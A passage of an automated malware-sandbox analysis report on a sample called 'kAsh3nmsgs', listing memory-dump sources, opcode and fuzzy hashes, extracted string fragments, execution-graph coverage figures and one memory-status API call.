                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5d20f1a15b0a8e24de048bd15cab6ba5d031e9f489d3e572e33611b1270b4a29
                                                                                                                • Instruction ID: 2f60ee0ef70d3c1b499b68213cf7ca904bf869de413a68f1d650b2c4949d4ed7
                                                                                                                • Opcode Fuzzy Hash: 5d20f1a15b0a8e24de048bd15cab6ba5d031e9f489d3e572e33611b1270b4a29
                                                                                                                • Instruction Fuzzy Hash: CD51F9B4E102198BDB14CFA9C5845AEFBF2FF89304F24C169D418A7256D731AD41CFA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8ae4d9db1681451e2fd8cdbb463c2297494dc5c28f6d504f185512963075e220
                                                                                                                • Instruction ID: 95211fbf8ac558c945f77ee89a01826229223c289a15ec31a0503dbd4620e580
                                                                                                                • Opcode Fuzzy Hash: 8ae4d9db1681451e2fd8cdbb463c2297494dc5c28f6d504f185512963075e220
                                                                                                                • Instruction Fuzzy Hash: C25139B0E142198FDB14CFA9C5805AEFBF2FF89305F24C169E408AB256D731A941CFA0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1729500262.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1480000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 807bbf873ddabe4ace812fa74709fb7651c5fe5c2073b6e85e450c18f0e0b605
                                                                                                                • Instruction ID: c422a1788b07f098460340c7677850118fab01ded517ec509f3a52c99ca2108f
                                                                                                                • Opcode Fuzzy Hash: 807bbf873ddabe4ace812fa74709fb7651c5fe5c2073b6e85e450c18f0e0b605
                                                                                                                • Instruction Fuzzy Hash: 23418131F2421A8FCF44DFA8C9816AEBBF5FB89610B15816BD41AEB361C274DD01CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1729500262.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1480000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c950db1fb033b1df3f28ae63a6cdabff3dc687681900f447d39bb7c13a9856c2
                                                                                                                • Instruction ID: 9e7aa5a6d64b7e626d8d0a8fbb8b358594b3a9a3114ee373d39d64d96ae1b982
                                                                                                                • Opcode Fuzzy Hash: c950db1fb033b1df3f28ae63a6cdabff3dc687681900f447d39bb7c13a9856c2
                                                                                                                • Instruction Fuzzy Hash: AC41A171A04605CFC754DB6DC881A6BBBF2FF84220B14886BE82ACB671D2B4D942CB11
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1729500262.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1480000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:8.8%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:39
                                                                                                                Total number of Limit Nodes:5

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2392861976

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q
                                                                                                                • API String ID: 0-355816377

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-3823777903

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2392861976
                                                                                                                • Opcode ID: cce743016355765ab5bdfdab06455464fe45e12ad2cddb8fa5adb03590bfc9ac
                                                                                                                • Instruction ID: 95e4755161afac0627147b72f5ab9e1694cf3bc43f2767e26cbe6e418ee65ef3
                                                                                                                • Opcode Fuzzy Hash: cce743016355765ab5bdfdab06455464fe45e12ad2cddb8fa5adb03590bfc9ac
                                                                                                                • Instruction Fuzzy Hash: C2027B30E1022A8FDF64DB68D4846ADB7F6EB45318F24892AD409DB64DDB30DC85CB91

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2125118731
                                                                                                                • Opcode ID: 72fdd960fd29c64786fce4dbf6cdbed5f53d8e5c63cf6afd8d8497750f48cf62
                                                                                                                • Instruction ID: 30e9a92003d430247f668e6c3b0fec33b355c3887fe4705b0796770340868ea6
                                                                                                                • Opcode Fuzzy Hash: 72fdd960fd29c64786fce4dbf6cdbed5f53d8e5c63cf6afd8d8497750f48cf62
                                                                                                                • Instruction Fuzzy Hash: 8E916130F1021A8FDB54DB65D9507AEB7FABFC9204F208569C809EB748EB70DD468B91

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q
                                                                                                                • API String ID: 0-831282457
                                                                                                                • Opcode ID: 9f61267a22db0ebe855df0ffb868190dcc302696e765948698eb4c0ba58132f3
                                                                                                                • Instruction ID: 654729c0f05baf8f7ef8691b6e47db955733248d377447185ed340b50af5cb16
                                                                                                                • Opcode Fuzzy Hash: 9f61267a22db0ebe855df0ffb868190dcc302696e765948698eb4c0ba58132f3
                                                                                                                • Instruction Fuzzy Hash: 37623E30A002168FCB55EB68D590A5DB7F2FF84314B208A69D019DF76DDB71ED8ACB80

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: fcq$XPcq$\Ocq
                                                                                                                • API String ID: 0-3575482020
                                                                                                                • Opcode ID: 19641d0a3cd30b9eff9ac514732ec3df6ed1eda0c04f42e5658354b6bffa8619
                                                                                                                • Instruction ID: f4674b0d7aa7541f65b959089f2f94e63343523102b49d7cc831940975ecdcb6
                                                                                                                • Opcode Fuzzy Hash: 19641d0a3cd30b9eff9ac514732ec3df6ed1eda0c04f42e5658354b6bffa8619
                                                                                                                • Instruction Fuzzy Hash: FD618130F102199FEB549FA4C8547AEBBF6FB88710F20852AD105EB398DB758C458B91

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q
                                                                                                                • API String ID: 0-355816377
                                                                                                                • Opcode ID: deb67073f4e474860a6b0fbedbb038751fbfd9b140d93f23fbca1b3f19240978
                                                                                                                • Instruction ID: cbd4fcae4a8d549ee1c469b742ada8f91ab8dba4d014250310ee32e18a249187
                                                                                                                • Opcode Fuzzy Hash: deb67073f4e474860a6b0fbedbb038751fbfd9b140d93f23fbca1b3f19240978
                                                                                                                • Instruction Fuzzy Hash: 0C517530B102169FDB54DB75D950BAEB7FAABC9244F108569D809DB38CEB30DC428B95
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4149547363.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1170000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7abfba29e02f72b27c82dbf5740a83f91ee7b61d3e089dcba1bdff8781c52841
                                                                                                                • Instruction ID: a34b8176f64214ce44a00034811fbf5c20c73c9184e713b630239a8f1d405cc9
                                                                                                                • Opcode Fuzzy Hash: 7abfba29e02f72b27c82dbf5740a83f91ee7b61d3e089dcba1bdff8781c52841
                                                                                                                • Instruction Fuzzy Hash: 29414272D053899FCB18DFB9D8046EABFF1AF8A210F1981AAD504E7351DB349845CBA1
                                                                                                                APIs
                                                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 0117EC7F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4149547363.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1170000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                • String ID:
                                                                                                                • API String ID: 1890195054-0
                                                                                                                • Opcode ID: bdf4f2aa1f326b67bfb6d5abcbdbb3c982903791b11135061843796fd66fa85b
                                                                                                                • Instruction ID: e95699d64c7ff9e7af49e70e7e52c172c97ad6945d2dc3ee36e748c203173d99
                                                                                                                • Opcode Fuzzy Hash: bdf4f2aa1f326b67bfb6d5abcbdbb3c982903791b11135061843796fd66fa85b
                                                                                                                • Instruction Fuzzy Hash: 02111FB1C002699BDB10DF9AC544BDEFBF4AB48320F14816AD818B7240D378A940CFA5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: XPcq
                                                                                                                • API String ID: 0-714321711
                                                                                                                • Opcode ID: c16a7858e323f8b1a6e9814c437fc332bdf71f1d3483afb001a1d8d2edc1a823
                                                                                                                • Instruction ID: dec4327ecfe292d325505fdf22b5874cb7b80982b5d041d1f8212c07a64e0b29
                                                                                                                • Opcode Fuzzy Hash: c16a7858e323f8b1a6e9814c437fc332bdf71f1d3483afb001a1d8d2edc1a823
                                                                                                                • Instruction Fuzzy Hash: E5419D30A002099FDB559FB8C854BAEBBF6FF88700F20852AD155EB399DB708C018B91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PH^q
                                                                                                                • API String ID: 0-2549759414
                                                                                                                • Opcode ID: 2519fea56fc07a90895f02094aa20dcc120a02a4bbca824192beb4e090d8ef54
                                                                                                                • Instruction ID: cd4701a50285af2c93d1f77fbe419b324bbaf3cd9cd8bc9bb420b90b9de211a0
                                                                                                                • Opcode Fuzzy Hash: 2519fea56fc07a90895f02094aa20dcc120a02a4bbca824192beb4e090d8ef54
                                                                                                                • Instruction Fuzzy Hash: BC41E030E0071A9FDF65DF64C49469EBBB6FF85700F20492AE411EB648DB70D94ACB81
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PH^q
                                                                                                                • API String ID: 0-2549759414
                                                                                                                • Opcode ID: 127a6491980846ec33a82af6357cf67e0de554f355631118a4f7b4942eaa9969
                                                                                                                • Instruction ID: 7d3d3b7a3c94bce933048ada28d8e082192eb9d434eaaaa6274bd2198fe92a88
                                                                                                                • Opcode Fuzzy Hash: 127a6491980846ec33a82af6357cf67e0de554f355631118a4f7b4942eaa9969
                                                                                                                • Instruction Fuzzy Hash: 3C31C030B003168FDB59AB74C55426EBBE6BB89610F208479D406DB78CDF36DE46CB91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PH^q
                                                                                                                • API String ID: 0-2549759414
                                                                                                                • Opcode ID: 43a7bc2ab8a144a8a8698230a5cb40f83781e88511aa9c9d9810d30695f6a8b6
                                                                                                                • Instruction ID: 5e90eebb1c72d5f60e358c27afb0f024c7ef134c8cee847cfba0b0f74975fe72
                                                                                                                • Opcode Fuzzy Hash: 43a7bc2ab8a144a8a8698230a5cb40f83781e88511aa9c9d9810d30695f6a8b6
                                                                                                                • Instruction Fuzzy Hash: BE31CF30B002168FDB59AB74C55466EBAE6BF89610F208439D406DB388DE36DE46CBA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4149152632.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_112d000_kAsh3nmsgs.jbxd
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4149152632.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_112d000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 14dd91b972a1f8e98b393ebb1f65d26e5ee4e95e69d907b855d0bf6485773fdd
                                                                                                                • Instruction ID: 5aa843406084eb98adf4a532966710eb1aa9d0b31d42bdf67d9d28323a0e0363
                                                                                                                • Opcode Fuzzy Hash: 14dd91b972a1f8e98b393ebb1f65d26e5ee4e95e69d907b855d0bf6485773fdd
                                                                                                                • Instruction Fuzzy Hash: 25216871504244DFDF09DF58E5C4B2ABB65FB85334F20C669E8094B242C376D426CA62
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2db19808985e97cbc3275106b0529ddf7d71849fa1af15e841c630faadecf86c
                                                                                                                • Instruction ID: 28910624a19fd1903fefbb3fc1b719ba210fb5bbecfebed8b07e5eb22bdb4e00
                                                                                                                • Opcode Fuzzy Hash: 2db19808985e97cbc3275106b0529ddf7d71849fa1af15e841c630faadecf86c
                                                                                                                • Instruction Fuzzy Hash: 0E21A230B1012A9BDF44EB69E8547AEB7B6EB84310F248435D405EB748DB31ED528BC5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 717d4e75a609a6ccee26d3def001e24466ff6932efecea1898ba3832a03aa033
                                                                                                                • Instruction ID: 77ae7ad2b8bf8695ee6f2f56641c1c9a4442b6a847e84c82e5bc5a138a0dc187
                                                                                                                • Opcode Fuzzy Hash: 717d4e75a609a6ccee26d3def001e24466ff6932efecea1898ba3832a03aa033
                                                                                                                • Instruction Fuzzy Hash: 57116136B141355FDF54E668D814AAF73EAABC8610F10853AD90AE7344EF64DC028BD1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4d33de7057a9087873d02e780f89511ebdfd28be0be279ea6b7db0d18e6cf699
                                                                                                                • Instruction ID: 150eda079e6adafcc3b1120b255ed6384b3a25a27839eb3af0113b39a33cdc87
                                                                                                                • Opcode Fuzzy Hash: 4d33de7057a9087873d02e780f89511ebdfd28be0be279ea6b7db0d18e6cf699
                                                                                                                • Instruction Fuzzy Hash: 1B01F9307001611BCB65967DD41472FBBDADBCAA10F288839E10EC7B49DA11DC428381
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d7ff1d13b71c0e837b8f9614fec793180fdd6f0f87551db33246520ca898616e
                                                                                                                • Instruction ID: 38d4f01802666063f10c4c2ec70abeb011e11e76f319e14782bd769a142768ff
                                                                                                                • Opcode Fuzzy Hash: d7ff1d13b71c0e837b8f9614fec793180fdd6f0f87551db33246520ca898616e
                                                                                                                • Instruction Fuzzy Hash: 6101D831B001111FD761EB3DD85475EBBDAEB87614F20887AE54ACB749EF21DD028395
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9f8fda38f5d730c6d9b47e1938c22fd05e123dfbb63d73d75f23c12a36acee25
                                                                                                                • Instruction ID: 37c35ad746dc20edada7865a031a1c0ab74b54932a229d6e601327b5a2c2b841
                                                                                                                • Opcode Fuzzy Hash: 9f8fda38f5d730c6d9b47e1938c22fd05e123dfbb63d73d75f23c12a36acee25
                                                                                                                • Instruction Fuzzy Hash: 9021E0B5D01219EFCB00DF9AD884ADEFFB8FB49310F10812AE918A7240C774A550CFA5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 502d793e71026ae9caaccf3b8edc1d24aa3591489216fcaa7d144141c3730853
                                                                                                                • Instruction ID: 9a1665619a434173bf96bef37d76f881b5e0a2fa87b7090537ea1f8c28204a40
                                                                                                                • Opcode Fuzzy Hash: 502d793e71026ae9caaccf3b8edc1d24aa3591489216fcaa7d144141c3730853
                                                                                                                • Instruction Fuzzy Hash: F801F532B140351BDF54D679D8106EB7BEB9BC8A10F14813AD90AD7244EF649C028BD6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4149152632.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_112d000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                • Instruction ID: a5a04a3c81f70146e6d0da88c38d16de8e57fe534c5f6cb113a38101c3ca4367
                                                                                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                • Instruction Fuzzy Hash: 0211DD75504280CFDB0ACF54E5C4B55BFA2FB84318F24C6AAD8494BA56C33AE41ACBA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4149152632.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_112d000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                • Instruction ID: b4d83f6093b65762d9c4574ad4cbe4fad97f221ee9551c418e14b20e18023d88
                                                                                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                • Instruction Fuzzy Hash: E711DD75504284CFDB1ACF64D9C4B16BFA2FB84314F24C6AAD8494B662C33AD45ACF62
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4149152632.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_112d000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                • Instruction ID: 87aa63ea5b3e573e4ab12ee2009699cf6ae7a13e8c629cbcf197f34f3d93ef1a
                                                                                                                • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                • Instruction Fuzzy Hash: D911EF76504284CFDB06CF54E5C4B16FF61FB85324F24C6AADC490B646C33AD41ACBA2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 899b176c3cbc22c40c57a8039c77f3320aef32594f2d073b84da9f3f060abfb7
                                                                                                                • Instruction ID: d39725f1c9a56c7f119ba3c3b88fb3324254dcd75e04601f15b4c46468e80425
                                                                                                                • Opcode Fuzzy Hash: 899b176c3cbc22c40c57a8039c77f3320aef32594f2d073b84da9f3f060abfb7
                                                                                                                • Instruction Fuzzy Hash: 1C01A735B140114FCB65DB7DD494B3E77EAEBC9614F248839E50EC7349DA21DD028385
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2b398050ec0975f9c30789671357ab847d18464f717a6fa1ca36402a516ba69b
                                                                                                                • Instruction ID: cfbad164462ac863c8a3f52fb1fa46d6a6d4ac4180c6353493344b2a2a0cc497
                                                                                                                • Opcode Fuzzy Hash: 2b398050ec0975f9c30789671357ab847d18464f717a6fa1ca36402a516ba69b
                                                                                                                • Instruction Fuzzy Hash: 5911A2B5D01259EFCB00DF9AD884ADEFBB4FB49310F50812AE518A7250C374A554CFA5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 05b9e14dd6d03a8c158cccc155db9558f987707f07dd1a53ba0f9906e545ca4c
                                                                                                                • Instruction ID: a4d7ec111006227996f82de98ab070c8618577825b288fa80898abdb4f5f2650
                                                                                                                • Opcode Fuzzy Hash: 05b9e14dd6d03a8c158cccc155db9558f987707f07dd1a53ba0f9906e545ca4c
                                                                                                                • Instruction Fuzzy Hash: 6E018635B101211BDB54966ED454B2FB7DFEBC9B10F24843AE60EC7B48DE61DC424395
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 671ea80f6ce60471eb9ec98a68b4786625b5af97d10b734c754062db6808c805
                                                                                                                • Instruction ID: f6ba52e43027db79bb6ee87c70bf49ac7c6ca9fa160a2dc18bf8955990aae157
